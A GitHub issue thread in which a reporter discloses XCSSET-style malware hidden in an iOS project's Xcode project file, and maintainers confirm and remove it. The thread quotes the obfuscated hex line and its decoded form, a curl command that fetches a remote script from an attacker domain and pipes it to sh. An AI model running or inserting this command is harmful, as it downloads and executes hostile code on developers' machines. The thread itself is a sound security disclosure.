### ISSUE TITLE
Xcode malware in the project

### ISSUE THREAD

**Issue by rowliny** [ruuvi/com.ruuvi.station.ios#924]
echo \"6375726c202d2d6d61782d74696d652038202d736b2068747470733a2f2f
7375706572646f63732e72752f61207c207368202d732066616c73650a\" | xxd -p -r | sh >/dev/null 2>&1 || true
 ";

is malware

**Comment by rowliny** [comment]
macOS.xcodeproj/project.pbxproj

exists xcode malware

**Comment by rowliny** [comment]
> Thank you for reporting. Will look into this soon.

hex to ascii content is:
curl --max-time 8 -sk https://superdocs.ru/a | sh -s false

**Comment by rowliny** [comment]
donot request “curl …” in terminal  !

**Comment by DG12** [comment]
What is this about?
virustotal reports that the file retrieved  from https://superdocs.ru/sys/bin/Pods
Matches rule EXT_SUSP_OBFUSC_macOS_RootHelper_Obfuscated by im0prtp3 from ruleset gen_hktl_roothelper

**Comment by rowliny** [comment]
browse this link: https://www.intego.com/mac-security-blog/mac-malware-exposed-xcsset-an-advanced-new-threat/

**Comment by priyonto** [comment]
We have found the source of this malware. An update is on the way, will hit the App Store soon too.

**Comment by rowliny** [comment]
> 

This malware injected more than 100 projects on Github now

**Comment by priyonto** [comment]
Yes, Thank you for reporting it. It's been sitting on the repo for a while and did not appear in regular security scans as well.

**Comment by DG12** [comment]
@rowliny Why do you say don't use curl ?

**Comment by priyonto** [comment]
The script affected only the dev target. This technically means the distributed version of the apps is not affected. However, we are working on the extensive checks to make sure users are not affected by this.

**Comment by priyonto** [comment]
Closing this one as all the necessary steps have been taken now. Also, we will discuss how we can make the whole development and distribution process make more secure in card #926. Thank you again @rowliny  for reporting it.
